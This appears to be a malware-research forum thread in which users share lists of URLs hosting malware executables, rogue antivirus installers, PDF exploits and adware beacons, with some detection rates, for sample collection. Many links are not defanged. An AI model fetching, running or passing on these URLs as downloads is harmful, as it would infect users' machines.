b152.bundlext.com/ack.php?version=16&uid=F4E4961A-08A2-1033-0410-070000000001&status=MayBe_Ok&cb=62.tmp
b152.bundlext.com/ack.php?version=16&uid=F4E4961A-08A2-1033-0410-070000000001&status=OK
b152.bundlext.com/ack.php?version=17&uid=F4E4961A-08A2-1033-0410-070000000001&status=OK_new&cb=4D.tmp
bugreport.waverevenue.com/gt_bd.php?srky=b143ed367cf5de85adcc2c7002cc3edf&version=92_avn&GUID=398F1596C68A24134386385E03F80CE3C6832B0F329F39566FF916E3C2832212339B385673B4&cmd=61A847B5BBF728173599284503996897C881250221C8670836AC4FA7C8833201749139&p=1&i=,157:1R0,161:1R0,156:3R0,155:3R0,152:3R0&x=298312&tst=Am,Am
bugreport.waverevenue.com/gt_bd.php?srky=b143ed367cf5de85adcc2c7002cc3edf&version=92_avn&GUID=398F1596C68A24134386385E03F80CE3C6832B0F329F39566FF916E3C2832212339B385673B4&cmd=61A847B5BBF728173599284503996897C881250221C8670836AC4FA7C8833201749139&p=1&i=,157:1R0,161:1R0,156:3R0,155:3R0,152:3R0,158:1R0&x=599453&tst=Am,Am
bugreport.waverevenue.com/gt_bd.php?srky=b143ed367cf5de85adcc2c7002cc3edf&version=92_avn&GUID=398F1596C68A24134386385E03F80CE3C6832B0F329F39566FF916E3C2832212339B385673B4&cmd=61A847B5BBF728173599284503996897C881250221C8670836AC4FA7C8833201749139&p=1&i=,157:1R0,161:1R0,156:3R0,155:3R0,152:3R0,158:1R0,103:1R0&x=899937&tst=Am,Am
bugreport.waverevenue.com/gt_bd.php?srky=b143ed367cf5de85adcc2c7002cc3edf&version=92_avn&GUID=398F1596C68A24134386385E03F80CE3C6832B0F329F39566FF916E3C2832212339B385673B4&cmd=61A847B5BBF728173599284503996897C881250221C8670836AC4FA7C8833201749139&p=1&i=,157:1R0,161:1R0,156:3R0,155:3R0,152:3R0,158:1R0,103:1R0,104:1R0&x=1209390&tst=Am,Am
bugreport.waverevenue.com/gt_bd.php?srky=b143ed367cf5de85adcc2c7002cc3edf&version=92_avn&GUID=398F1596C68A24134386385E03F80CE3C6832B0F329F39566FF916E3C2832212339B385673B4&cmd=61A847B5BBF728173599284503996897C881250221C8670836AC4FA7C8833201749139&p=1&i=,157:1R0,161:1R0,156:3R0,155:3R0,152:3R0,158:1R0,103:1R0,104:1R0,116:2R0&x=1510093&tst=Am,Am
bugreport.waverevenue.com/gt_bd.php?srky=b143ed367cf5de85adcc2c7002cc3edf&version=92_avn&GUID=398F1596C68A24134386385E03FB0CE3C6832B0F329F39566FF916E3C2832212339B385673B4&cmd=61A847B5BBF728173599284503996897C881250221C8670836AC4FA7C8833201749139&p=&i=&x=866906&tst=Am,Am
bugreport.waverevenue.com/gt_bd.php?srky=b143ed367cf5de85adcc2c7002cc3edf&version=92_avn&GUID=398F1596C68A24134386385E03FB0CE3C6832B0F329F39566FF916E3C2832212339B385673B4&cmd=61A847B5BBF728173599284503996897C881250221C8670836AC4FA7C8833201749139&p=1&i=,152:3R0&x=1166656&tst=Am,Am
bugreport.waverevenue.com/gt_bd.php?srky=b143ed367cf5de85adcc2c7002cc3edf&version=92_avn&GUID=398F1596C68A24134386385E03FB0CE3C6832B0F329F39566FF916E3C2832212339B385673B4&cmd=61A847B5BBF728173599284503996897C881250221C8670836AC4FA7C8833201749139&p=1&i=,152:3R0,155:3R0&x=1467078&tst=Am,Am
bugreport.waverevenue.com/gt_bd.php?srky=b143ed367cf5de85adcc2c7002cc3edf&version=92_avn&GUID=398F1596C68A24134386385E03FB0CE3C6832B0F329F39566FF916E3C2832212339B385673B4&cmd=61A847B5BBF728173599284503996897C881250221C8670836AC4FA7C8833201749139&p=1&i=,152:3R0,155:3R0,156:3R0&x=1768890&tst=Am,Am
bugreport.waverevenue.com/gt_bd.php?srky=b143ed367cf5de85adcc2c7002cc3edf&version=92_avn&GUID=398F1596C68A24134386385E03FB0CE3C6832B0F329F39566FF916E3C2832212339B385673B4&cmd=61A847B5BBF728173599284503996897C881250221C8670836AC4FA7C8833201749139&p=1&i=,152:3R0,155:3R0,156:3R0,161:1R0&x=2071515&tst=Am,Am
bugreport.waverevenue.com/gt_ky.php
bugreport.waverevenue.com/rp.txt?uid=F4E4961A-08A2-1033-0410-070000000001&iam=I&st=Ok
dl.targetsaver.com/2k/affupdate2.php?affversion=0.0.0.0&tsversion=4.0.4.1&code=1804289383&aid=109&continent=151481350&country=840®ion=11&metro=524&city=3670
dl.targetsaver.com/2k/tsinstall_4_0_4_0_b4.exe
dl.targetsaver.com/2k/tsupdate_4_0_4_1_b3.exe
dl.targetsaver.com/2k/tsupdate2.ini
dl.targetsaver.com/2k/tsupdate2.php
dl.targetsaver.com/redirect.php?clientID=109.-186345958.1804289383&finalURL=http%3A%2F%2Fpopunder.multi-pops.com%2FadsDirect.php%3Fcid%3D7490990%26id%3Dfindology07%26sid%3D73440%26ref%3Dhttp%3A%2F%2Fwww.findology.com&affiliateID=2957&trace=T:
dl2.bundlext.com/get.php?p=26453da423d82a5fc6fae941d05f1151&cb2=6900cc07255f403aa633f9364283176b
dl2.bundlext.com/get.php?p=3cd898b13299cb4bc0d5dc64745518ed&cb2=6900cc07255f403aa633f9364283176b
dl2.bundlext.com/get.php?p=718f466754402ac597de014577627f96&cb2=6900cc07255f403aa633f9364283176b
dl2.bundlext.com/get.php?p=773953af7fc444d491933450d966e0b2&cb2=6900cc07255f403aa633f9364283176b
dl2.bundlext.com/get.php?p=8605fbac333a37d112b7d4b2e6de281f&cb2=6900cc07255f403aa633f9364283176b
dl2.bundlext.com/get.php?p=93e4c2046fcb4ac4bdc3dbbcc28127fb&cb2=6900cc07255f403aa633f9364283176b
dl2.bundlext.com/get.php?p=a537119c47192bc08952189ae8782f08&cb2=6900cc07255f403aa633f9364283176b
dl2.bundlext.com/get.php?p=b433b5a80d2cb00f8f1c54387f9aa332&cb2=6900cc07255f403aa633f9364283176b
dl2.bundlext.com/get.php?p=c1f5cc94a30f082054f3a00e6655462d&cb2=6900cc07255f403aa633f9364283176b
flog.virusremover2008.com/?action=18&a=swpsni&l=288&f=pp_1394267317&lp=105&addt=bXRfaW5mbz0zNzkzXzBfMjI5ODA6Mzc4OF8wXzI4NDY3JnN1Yj1VTkQ&pc_id=3159360949&abbr=3P_UVRM_5712_4.3
flog.virusremover2008.com/?action=38&a=swpsni&l=288&f=pp_1394267317&lp=105&addt=bXRfaW5mbz0zNzkzXzBfMjI5ODA6Mzc4OF8wXzI4NDY3JnN1Yj1VTkQ&pc_id=3159360949&abbr=3P_UVRM_5712_4.3
flog.virusremover2008.com/?action=39&a=swpsni&l=288&f=pp_1394267317&lp=105&addt=bXRfaW5mbz0zNzkzXzBfMjI5ODA6Mzc4OF8wXzI4NDY3JnN1Yj1VTkQ&pc_id=3159360949&abbr=3P_UVRM_5712_4.3
flog.virusremover2008.com/?action=5&a=swpsni&l=288&f=pp_1394267317&lp=105&addt=bXRfaW5mbz0zNzkzXzBfMjI5ODA6Mzc4OF8wXzI4NDY3JnN1Yj1VTkQ&pc_id=3159360949&abbr=3P_UVRM_5712_4.3
fstat.cn/in.cgi?id109
fstat.cn/tds/in.cgi?2
italiano-service.org/manage.cgi?27d64e000100f06000cc8136dc068ae61d20026f3d26ccff03656e2d75730000000000
italiano-service.org/manage.cgi?27d64e000100f06002cc8136dc068ae61d20026f3d26ce00030409000000000200
italiano-service.org/manage.cgi?badi
mtn6.com-com.ws/ac.php?bannerid=1&zoneid=1&target=_blank&withtext=&source=&timeout=0&ct0=
mtn6.com-com.ws/aiw3.php?try=1&ver=16&uid=F4E4961A-08A1-1033-0410-070000000001&cu=Dank&cb=7893
mtn6.com-com.ws/aiw3.php?try=1&ver=16&uid=F4E4961A-08A1-1033-0410-070000000001&cu=Dank&cb=802
mtn6.com-com.ws/aiw3.php?try=1&ver=16&uid=F4E4961A-08A2-1033-0410-070000000001&cu=Dank&cb=3006
mtn6.com-com.ws/lg.php?bannerid=1&campaignid=1&zoneid=1&cb=ba37b62fa6
mtn6.com-com.ws/lg.php?bannerid=1&campaignid=1&zoneid=1&cb=f5be0cd602
mtn6.goole.ws/ac.php?bannerid=4&zoneid=3&target=_blank&withtext=&source=&timeout=0&ct0=
mtn6.goole.ws/aiwado.php?xtt=737
mtn6.goole.ws/lg.php?bannerid=4&campaignid=3&zoneid=3&cb=21ba48dacb
myprivatetube.net/1/bigcock1/0/712/0/black/
myprivatetube.net/cd/712/0/wmcodec_update.exe
randomnewnames.com/external/bchanger.exe
randomnewnames.com/v/files/targets.gz
randomnewnames.com/v/we-active.php?uid=17646394261871452226&cfgid=100&aid=28&v=21&d=0&pc=0&pc2=0&country=US
randomnewnames.com/v/we-config.php?uid=17646394261871452226&cfgid=100&aid=28&v=21&ucnt=0
randomnewnames.com/v/we-connect.php
randomnewnames.com/v/we-content.php?cid=356&uid=17646394261871452226&rnd=4322
randomnewnames.com/v/we-content.php?cid=377&uid=17646394261871452226&rnd=327
randomnewnames.com/v/we-content.php?cid=387&uid=17646394261871452226&rnd=6921
randomnewnames.com/v/we-dictionaries.php
randomnewnames.com/v/we-install.php?uid=17646394261871452226&cfgid=100&aid=28&v=21&key=e00f3e0322f287351fc10feff0471412
randomnewnames.com/v/we-popup.php?uid=17646394261871452226&cfgid=100&aid=28&v=21&kw=pussy|fuck&country=US
randomnewnames.com/v/we-popup.php?uid=17646394261871452226&cfgid=100&aid=28&v=21&kw=ron&country=US
randomnewnames.com/v/we-tpa.php?uid=17646394261871452226&cfgid=100&aid=28&v=21&d=0
randomnewnames.com/v/we-tpa-track.php?name=bchanger.exe
speed-runner.com/./data/configs/INSTALLS/config.cfg
speed-runner.com/./data/speedrunner/uninstaller/sruninstaller.prod.v12000.11jan2008.exe.1ac39aea6b22cdb4e6ed0c75f1d83467
speed-runner.com/upd.php?wtdat=1061a99f58f7c7961801b5fd0ebe6d5edd0bcb8d5001b123fe3053941a1076be9ef59850dce64ebe8c6dd2b410527036
speed-runner.com/upd.php?wtdat=677f31fe4cd508bb6c15061542e61381
spyguardpro.com/data/?cmpname=swpsnpr34&gai=swp_snipsg&gli=288&gff=pp_1389567286&ex=5&ed=2&eu=http%3A%2F%2Fpcprivacytool.com%2Fprivacy%2F%3Fp%3D840%26gai%3Dswp_snipsgexx51%26gli%3D288%26gff%3Dpp_1389567286%26ex%3D5&
virusremover2008plus.com/secure/5e7da2d5e3beca6d6d7f9548cf0fb655/48eb60d5/VirusRemover2008_Setup_Free_en.exe?a=swpsni&l=288&f=pp_1394267317&p=105&mt_info=3793_0_22980:3788_0_28467&sub=UND
wrpx.service.mirror-image.net/binaries/installer.php?a=MTE3MTk6ODoxNg
wrpx.service.mirror-image.net/binaries/installer.php?a=MTE5MTA6ODoxNg
wrpx.service.mirror-image.net/binaries/relevance.dat
-
Thanks.
-
hxxp://online-scan.net/jktnslbngksjhgktiyyorrfkgmtt.js
-
http://peterharris.com.au/lsys/lscan2.exe (c1b7ea81f3f8517a89f568ad6f416040)
http://marsdenpilgrimages.com.au/lsys/lscan2.exe (c1b7ea81f3f8517a89f568ad6f416040)
http://eternityevents.com.au/lsi/skash.exe (c37a11e2fca56c28ba45f5343968a870)
http://www.ecotopo.com.au/images/lspr.exe (0d1906f9157962d5d2235e803e392720)
http://www.ecotopo.com.au/images/kashi.exe (15113ee714454f223a169fde831e4d15)
http://www.ecotopo.com.au/images/rep.exe (a217cdb07aa1bc2dad954dd2bd30f52c)
http://utevox.site90.com/f/load.php?id=15835&spl=2 (4e56b5b89502be8eec70954de3339026)
http://life-tablets.cn/fi/load.php?id=1916&spl=1 (91bf8e0015765cd806f1046afa2c05da)
http://www.business-from-home.de/flash/install_flash_player.exe (92d7aa2c6555d5aa9e710183043ec350)
http://codecdownload.i-softportal.net/xcodec.281.exe (8e133c59afe4a74f0e236426fe544707)
http://dab-bank.demeinedabbank.login.app.comservlet.5cjskyec6secbps.sitesurvey.exacttrget.binzytvf.com/DABDigicertx.509.exe (5325777dae2dc88492d0b4e01a75320a)
http://omalissi.com.ar/pornivideo03y45i.exe (a42c5666512be0ac9572bb563d103afd)
http://www.mediamovware.com/download.php?id=1018 (d4e2892b8281943e1a06f3a6fb089c69)
-
http://www.vivotorpedo.us/sms/foto/torpedo/macromediaflashinstall.exe
http://www.txjsrf.com/img/1x1_pix.gif
http://a158158.googlepages.com/AbsoluteSoundRecorderarbic.exe
http://myweb.saudi.net.sa/l33t/omg.exe
http://www.free-winks.info/data/msgthemes_worldcup.exe
http://cj.366ent.com/news/user/setup1438.txt
http://2008.366ent.com/2008/soft/upsetup.exe
http://cj.366ent.com/news/update.txt
http://www.free-winks.info/downloads/free-msn-emoticons-pack-02-setup.exe
http://www.free-winks.info/downloads/free-msn-emoticons-pack-01-setup.exe
-
Thanks.
-
http://www.726380.cn/001/022.exe
http://www.adwareblaster.com/download/bpssr.exe
http://save-my-pc-now.com/2009/download/trial/A9installer_770522166818.exe
http://www.antispyware-xp2009.com/install/Installer.exe
http://contenteraser.com/privacy/js/order.js
-
****http://67.15.107.166/winzix/070529/winzix-1.0-setup-0001.exe
http://ad.ote2008.info/ad.css
http://knut.kumoh.ac.kr/~kopress/board//skin/f2plus_gallery_2_0/.tmp/FrWall2.exe
http://dd4.tesekl.info/not.exe
http://dd6.tesekl.info/net.exe
http://www.ieqpatobranco.com.br/fotos.exe
http://cri66.web.cedant.com/windows.exe
http://avzhan.3322.org:81/1.exe****
-
http://61.160.213.143/wl.css
http://61.160.213.143/ma/cw01.exe
http://61.160.213.143/ma/cw02.exe
http://61.160.213.143/ma/cw03.exe
http://61.160.213.143/ma/cw04.exe
http://61.160.213.143/ma/cw05.exe
http://61.160.213.143/ma/cw06.exe
http://61.160.213.143/ma/cw07.exe
http://61.160.213.143/ma/cw08.exe
http://61.160.213.143/ma/cw09.exe
http://61.160.213.143/ma/cw10.exe
http://61.160.213.143/ma/cw11.exe
http://61.160.213.143/ma/cw12.exe
http://61.160.213.143/ma/cw13.exe
http://61.160.213.143/ma/cw14.exe
http://61.160.213.143/ma/cw15.exe
http://61.160.213.143/ma/cw16.exe
http://61.160.213.143/ma/cw17.exe
http://61.160.213.143/ma/cw18.exe
http://61.160.213.143/ma/cw19.exe
http://61.160.213.143/ma/cw20.exe
http://61.160.213.143/ma/cw21.exe
http://61.160.213.143/ma/cw22.exe
http://61.160.213.143/ma/cw23.exe
http://61.160.213.143/ma/cw24.exe
http://61.160.213.143/ma/cw25.exe
http://61.160.213.143/ma/cw26.exe
http://61.160.213.143/ma/cw27.exe
http://61.160.213.143/ma/cw28.exe
http://61.160.213.143/ma/cw29.exe
http://61.160.213.143/ma/cw30.exe
-
http://88.llxslaile1.com/1.exe
http://88.llxslaile1.com/2.exe
http://88.llxslaile1.com/3.exe
http://88.llxslaile1.com/4.exe
http://88.llxslaile1.com/5.exe
http://88.llxslaile1.com/6.exe
http://88.llxslaile1.com/7.exe
http://88.llxslaile1.com/8.exe
http://88.llxslaile1.com/9.exe
http://88.llxslaile1.com/10.exe
http://ffies.cn/shf/data0.mdb
http://ffies.cn/shf/skep.mdb
http://ffies.cn/shf/data1.mdb
http://ffies.cn/shf/fd05.mdb
http://m.c5x8.com/mm.exe
---------------------------
http://www.oiuyt.net/ko.txt
url1=http://61.164.118.208/new/new1.exe
url2=http://61.164.118.208/new/new2.exe
url3=http://61.164.118.208/new/new3.exe
url4=http://61.164.118.208/new/new4.exe
url5=http://61.164.118.208/new/new5.exe
url6=http://61.164.118.208/new/new6.exe
url7=http://61.164.118.208/new/new7.exe
url8=http://61.164.118.209/new/new8.exe
url9=http://61.164.118.209/new/new9.exe
url10=http://61.164.118.209/new/new10.exe
url11=http://61.164.118.209/new/new11.exe
url14=http://61.164.118.209/new/new14.exe
url15=http://61.164.118.209/new/new15.exe
url16=http://59.34.216.225/new/new16.exe
url17=http://59.34.216.225/new/new17.exe
url18=http://59.34.216.225/new/new18.exe
url19=http://59.34.216.225/new/new19.exe
url20=http://59.34.216.225/new/new20.exe
url21=http://59.34.216.225/new/new21.exe
url22=http://59.34.216.225/new/new22.exe
url23=http://59.34.216.225/new/new23.exe
url24=http://59.34.216.225/new/new24.exe
url25=http://59.34.216.225/new/new25.exe
url26=http://59.34.216.143/new/new26.exe
url27=http://59.34.216.143/new/new27.exe
url28=http://59.34.216.143/new/new28.exe
url29=http://59.34.216.143/new/new29.exe
url30=http://59.34.216.143/new/new30.exe
url31=http://59.34.216.143/new/new31.exe
url32=http://59.34.216.143/new/new32.exe
url33=http://59.34.216.143/new/new33.exe
url34=http://59.34.216.143/new/new34.exe
http://www.e-cut.ru/img/uname.exe
http://www.dendoelderpallets.eu/file/uname.exe
http://35122.ds.nac.net/.www.sapo.pt/oficceupdate.exe
http://209.123.8.48/.www2.sapo.pt/firewall.exe
-
http://tucows.netnitco.net/files/Setup_Registry_Defender.exe
http://www.pagefactorytest.nl/vvv/components/com_jce/videos.exe
http://www.ghiath.com/files/util/RRT.exe
http://ia-scanpro.com/download/IAInstalld.exe
http://ia-scanpro.com/download/IAInstall.exe
http://www.lwstats.com/11/PLAY-MOVIE.exe
-
http://bot.10wrj.com/bot1102.exe
http://so.91526.com/jj.exe
-
http://freegoogla.vicp.net/download/em_setup.exe
http://zz.ushealthmart.com/download/6767.exe
-
...since a few days passed since the fuzz around the ms08-067 worm,
thought it's about time to move these here as well... ;)
hxxp://zz.ushealthmart.com/download/67.exe
hxxp://www.ushealthmart.com/kernel/cmd.txt
hxxp://ce.10wrj.com/10wrjcenew.exe
hxxp://freegoogla.vicp.net/download/Loader.exe
hxxp://ls.cc86.info/mimi.1268772
hxxp://ls.lenovowireless.net/mimi.1268772
hxxp://ls.playswomen.com/mimi.1268772
hxxp://st.ushealthmart.com/download/webcc.exe
-
http://bot.10wrj.com/bot1102.exe
http://so.91526.com/jj.exe
thank you ;D
-
...since a few days passed since the fuzz around the ms08-067 worm,
thought it's about time to move these here as well... ;)
hxxp://zz.ushealthmart.com/download/67.exe
hxxp://www.ushealthmart.com/kernel/cmd.txt
hxxp://ce.10wrj.com/10wrjcenew.exe
hxxp://freegoogla.vicp.net/download/Loader.exe
hxxp://ls.cc86.info/mimi.1268772
hxxp://ls.lenovowireless.net/mimi.1268772
hxxp://ls.playswomen.com/mimi.1268772
hxxp://st.ushealthmart.com/download/webcc.exe
thank you ;)
-
http://www.interfejs.tv/download/MediaCellConverterSetup.exe
117.23.205.227/new/001.cab
117.23.205.227/new/002.cab
117.23.205.227/new/003.cab
117.23.205.227/new/004.cab
117.23.205.227/new/005.cab
117.23.205.227/new/006.cab
117.23.205.227/new/007.cab
117.23.205.227/new/008.cab
117.23.205.227/new/009.cab
117.23.205.227/new/010.cab
http://www.flaxweb.org/botnet1/bot_stuff/bot1.exe
http://193.27.246.185/zx/xvid.exe
http://alwayssam.com/lal222.exe
-
Various pdf-exploit variants,and different detection rates for the time being...
hxxp://218.93.205.42/cache/doc.pdf
hxxp://megsrdomain.cn/tor/exploits/pdf/2.pdf
hxxp://myfrooogle.cn/z/cache/doc.pdf
hxxp://nudeteens.in/4/cache/doc.pdf
-
hxxp://0012.ff-freehosting.com/vip/pdf.php?id=148754
hxxp://0012.ff-freehosting.com/vip/pdf.php?id=18802
hxxp://0012.ff-freehosting.com/vip/pdf.php?id=20408
hxxp://0012.ff-freehosting.com/vip/pdf.php?id=4777
hxxp://0012.ff-freehosting.com/vip/pdf.php?id=72811
hxxp://0012.ff-freehosting.com/vip/pdf.php?id=9678
hxxp://2.formybro.info/sis/getfile.php?f=pdf
hxxp://2.formybro.info/sis/getfile.php?f=vispdf
hxxp://59.125.229.78/tube/7/pdf.php?id=571
hxxp://78.157.142.122/us.pdf
hxxp://79.135.167.18/cgi-bin/index.cgi?16ee347b0100f060018c51855506ea6e98df025e5815210003000c000002bc17
hxxp://79.135.167.18/cgi-bin/index.cgi?c5c3b24c0100f060018c518555060c6ab3b1028d77d1970003000c000002bc17
hxxp://abb192.cn/exp/pdf.php?id=5093
hxxp://abb192.cn/spl3/pdf.php?id=14
hxxp://abc801.cn/exp/pdf.php?id=1619
hxxp://adultworld.name/new2/pdf.php
hxxp://bar-moscow.ru/2/sploits/test.pdf
hxxp://blonde.ff-freehosting.com/all/pdf.php?id=269235
hxxp://blonde.ff-freehosting.com/vip/pdf.php?id=116190
hxxp://blonde.ff-freehosting.com/vip/pdf.php?id=12768
hxxp://blonde.ff-freehosting.com/vip/pdf.php?id=244399
hxxp://blonde.ff-freehosting.com/vip/pdf.php?id=462713
hxxp://blonde.ff-freehosting.com/vip/pdf.php?id=49801
hxxp://blonde.ff-freehosting.com/vip/pdf.php?id=7121
hxxp://blonde.ff-freehosting.com/vip/pdf.php?id=76961
hxxp://blonde.ff-freehosting.com/vip/pdf.php?id=80963
hxxp://buterik.com/123/opdf.php
hxxp://dortumosio.com/adsl1/pdf.php
hxxp://dortumosio.com/adsl2/pdf.php
hxxp://dzenmoney.cn/pdf.php?id=2
hxxp://eliriumsoft.com/sup/cache/doc.pdf
hxxp://fdfgsdfvsdss.eu/webpage1/spl/pdf.pdf
hxxp://fiesta.1clinux.ru/pdf.php?acc=102&id=1
hxxp://golpii.com/25/1/getfile.php?f=pdf
hxxp://golpii.com/25/1/getfile.php?f=vispdf
hxxp://golpii.com/25/2/getfile.php?f=pdf
hxxp://golpii.com/25/2/getfile.php?f=pdf
hxxp://golpii.com/25/3/getfile.php?f=pdf
hxxp://golpii.com/25/3/getfile.php?f=vispdf
hxxp://google-moogle.net/fiesta/pdf.php?id=3858
hxxp://gtswiat.pl/grafika/gora2/ss/help.pdf
hxxp://hu1-hu1.cn/counter/getfile.php?f=pdf
hxxp://hu1-hu1.cn/counter/getfile.php?f=vispdf
hxxp://id-auto.ru/msn/pdf.php?id=14788
hxxp://lite.ff-freehosting.com/vip/pdf.php?id=19622
hxxp://lite.ff-freehosting.com/vip/pdf.php?id=221738
hxxp://lite.ff-freehosting.com/vip/pdf.php?id=28617
hxxp://lite.ff-freehosting.com/vip/pdf.php?id=6212
hxxp://lite.ff-freehosting.com/vip/pdf.php?id=8678
hxxp://lovekills.ru/kill/pdf.php?id=7323
hxxp://malemaleless.cn/adsl3/pdf.php
hxxp://onsline.com/spl/pdf.pdf
hxxp://ontilop.ru/.../sploits/test.pdf
hxxp://reddii.ru/traffic/sploit1/getfile.php?f=pdf
hxxp://reddii.ru/traffic/sploit1/getfile.php?f=vispdf
hxxp://soft.1clinux.ru/102.pdf
hxxp://srq3h.com/center/movies/images/xuk/help.pdf
hxxp://sunbizdirect.com/pdf.php?id=6626
hxxp://svinushka.net/forum/spl/pdf.pdf
hxxp://teentgp.cn/fiesta/pdf.php?id=16535
hxxp://v2bestcount.net/in/20/output.pdf
hxxp://v2statscount.net/in/34/output.pdf
hxxp://v2statscount.net/in/46/output.pdf
hxxp://v2statscount.net/in/65/output.pdf
hxxp://verzeih.com/state/2/cache/doc.pdf
hxxp://vn92.net/exp/14/pdf.php?id=3218
hxxp://vn92.net/exp/2/pdf.php?id=122
hxxp://vn92.net/exp/pdf.php?id=46688
hxxp://www.ivnnetwork.com/pdf.php?a=29826
hxxp://www.porngalleriesz.com/st/z/pdf.php?t=4&l=700
hxxp://ya-tracker.com/pdfdoc/flashba.pdf
...Hopefully these are enough pdf samples for people out there? ;)
-
hxxp://bhxtakekep.net/loaderadv563.exe
hxxp://71.18.116.75/pz/nana.exe
hxxp://72.8.146.36/3.exe
hxxp://alwayssam.com/lal222.exe
hxxp://alwayssam.com/so7.exe
hxxp://www.alwayssam.com/x3.exe
-
Small present for all malware hunters around...list is daily updated - have fun... :)
http://www3.malekal.com/exploit.txt
Credits for the hard work to be given were they should...and that is,to Malekal:
http://forum.malekal.com/index.php
-
I am doing a short write up for my blog on the PDF exploits and was wondering if I could use some of these samples in my write up? I will site source as MDL and the individuals that collected the samples such as sowhat if you all allow me to use them. Just want to get your permissions before I do the write up, thanks in advance either way.
-
cjeremy,you don't need to reference anyone,after all,
most of them were found simply via googling...then sorting/removing dupes etc...
When I stumble upon kinda large amounts of stuff,
that was already spotted and posted by other people in public,
(eg.like the referenced material above that was gathered by Malekal),
I personally always give the reference/credits/link to the post in question as well...
That is both for people to be able to follow over by themselves the updates there,
plus for common reasons of politeness obviously...and that's all there is to it. :)
Waiting for a good write-up with detailed analysis over at Sudosecure ;)
-
Small present for all malware hunters around...list is daily updated - have fun... :)
http://www3.malekal.com/exploit.txt
Credits for the hard work to be given were they should...and that is,to Malekal:
http://forum.malekal.com/index.php
Thank you :)
-
hxxp://ascoprguide.net/lel/load.php?xpl=pdf
It spawns 'load.exe'...Result: 6/35 (17.14%)
http://www.virustotal.com/analisis/d1e1d25d68004d4c8a3b2ad5e87174e9
hxxp://ascoprguide.net/lel/config/test.pdf
Result: 10/36 (17.14%)
http://www.virustotal.com/analisis/18a2be6aeec85eceea9ffa8fee14fb43
And it's EstDomains...from the same ip also:
hxxp://bestansia.net/lel/config/test.pdf
Result: 10/36 (27.78%)
http://www.virustotal.com/analisis/c529319c11a5eecb6318ecc2cfe6417f
hxxp://bestratebid.net/botout/test.pdf
Result: 12/36 (33.34%)
http://www.virustotal.com/analisis/2d33f75cf7dda11517a955de05bf4b00
hxxp://bestratebid.net/botout/load.php?xpl=mdac
Result: 6/36 (16.67%)
http://www.virustotal.com/analisis/cd62f24af130e17769147181f78a3f81
No other domains seem to exist in this ip...
http://www.robtex.com/ip/64.86.16.11.html
-
hxxp://59.34.197.63/exe1/b08.css
hxxp://59.34.197.63/exe1/b19.css
hxxp://59.34.197.63/exe1/bf.css
hxxp://59.34.197.63/exe1/bf.css
hxxp://59.34.197.63/exe1/ce.css
hxxp://59.34.197.63/exe1/ms.css
hxxp://59.34.197.63/exe1/re.css
hxxp://59.34.216.143/new/new34.exe
hxxp://59.34.216.143/new/new34.exe
hxxp://59.34.216.143/new/new35.exe
hxxp://59.34.216.143/new/new35.exe
hxxp://59.34.216.143/new/new36.exe
hxxp://59.34.216.225/new/new31.exe
hxxp://59.34.216.225/new/new32.exe
hxxp://59.34.216.225/new/new33.exe
hxxp://59.60.30.200/list/01.exe
hxxp://59.60.30.200/list/02.exe
hxxp://59.60.30.200/list/03.exe
hxxp://59.60.30.200/list/04.exe
hxxp://59.60.30.200/list/05.exe
hxxp://59.60.30.200/list/06.exe
hxxp://59.60.30.200/list/07.exe
hxxp://59.60.30.200/list/08.exe
hxxp://59.60.30.200/list/09.exe
hxxp://59.60.30.200/list/10.exe
hxxp://59.60.30.200/list/11.exe
hxxp://59.60.30.200/list/12.exe
hxxp://59.60.30.200/list/14.exe
hxxp://59.60.30.200/list/15.exe
hxxp://59.60.30.200/list/16.exe
hxxp://59.60.30.200/list/17.exe
hxxp://59.60.30.200/list/18.exe
hxxp://59.60.30.200/list/19.exe
hxxp://59.60.30.200/list/20.exe
hxxp://59.60.30.200/list/21.exe
hxxp://59.60.30.200/list/22.exe
hxxp://59.60.30.200/list/24.exe
hxxp://59.60.30.200/list/25.exe
hxxp://59.60.30.200/list/26.exe
hxxp://59.60.30.200/list/27.exe
hxxp://59.60.30.200/list/csmonet.exe
hxxp://59.60.30.200/list/msconet.exe
hxxp://61.160.210.41/new/new27.exe
hxxp://61.160.210.41/new/new28.exe
hxxp://61.160.210.41/new/new29.exe
hxxp://61.160.210.41/new/new30.exe
hxxp://61.160.210.42/new/new21.exe
hxxp://61.160.210.42/new/new22.exe
hxxp://61.160.210.42/new/new23.exe
hxxp://61.160.210.42/new/new24.exe
hxxp://61.160.210.42/new/new25.exe
hxxp://61.160.210.42/new/new26.exe
hxxp://61.160.210.43/new/new11.exe
hxxp://61.160.210.43/new/new12.exe
hxxp://61.160.210.43/new/new13.exe
hxxp://61.160.210.43/new/new15.exe
hxxp://61.160.210.44/new/new16.exe
hxxp://61.160.210.44/new/new17.exe
hxxp://61.160.210.44/new/new18.exe
hxxp://61.160.210.44/new/new19.exe
hxxp://61.160.210.44/new/new20.exe
hxxp://61.160.213.143/mb.txt
hxxp://61.164.118.209/new/new1.exe
hxxp://61.164.118.209/new/new10.exe
hxxp://61.164.118.209/new/new2.exe
hxxp://61.164.118.209/new/new3.exe
hxxp://61.164.118.209/new/new4.exe
hxxp://61.164.118.209/new/new5.exe
hxxp://61.164.118.209/new/new8.exe
hxxp://61.164.118.209/new/new9.exe
hxxp://61.164.118.211/new/new10.exe
hxxp://61.164.118.211/new/new6.exe
hxxp://61.164.118.211/new/new7.exe
hxxp://61.164.118.211/new/new8.exe
hxxp://61.164.118.211/new/new9.exe
hxxp://ad.uu500.com/3d226f621b4a032c.exe
hxxp://dddd.nihao69.cn/down/ko.exe
hxxp://down.cvz2.cn/hb/0.exe
hxxp://down.cvz2.cn/hb/1.exe
hxxp://down.cvz2.cn/hb/10.exe
hxxp://down.cvz2.cn/hb/11.exe
hxxp://down.cvz2.cn/hb/12.exe
hxxp://down.cvz2.cn/hb/13.exe
hxxp://down.cvz2.cn/hb/14.exe
hxxp://down.cvz2.cn/hb/15.exe
hxxp://down.cvz2.cn/hb/16.exe
hxxp://down.cvz2.cn/hb/17.exe
hxxp://down.cvz2.cn/hb/18.exe
hxxp://down.cvz2.cn/hb/19.exe
hxxp://down.cvz2.cn/hb/2.exe
hxxp://down.cvz2.cn/hb/20.exe
hxxp://down.cvz2.cn/hb/21.exe
hxxp://down.cvz2.cn/hb/22.exe
hxxp://down.cvz2.cn/hb/24.exe
hxxp://down.cvz2.cn/hb/25.exe
hxxp://down.cvz2.cn/hb/26.exe
hxxp://down.cvz2.cn/hb/27.exe
hxxp://down.cvz2.cn/hb/28.exe
hxxp://down.cvz2.cn/hb/29.exe
hxxp://down.cvz2.cn/hb/3.exe
hxxp://down.cvz2.cn/hb/30.exe
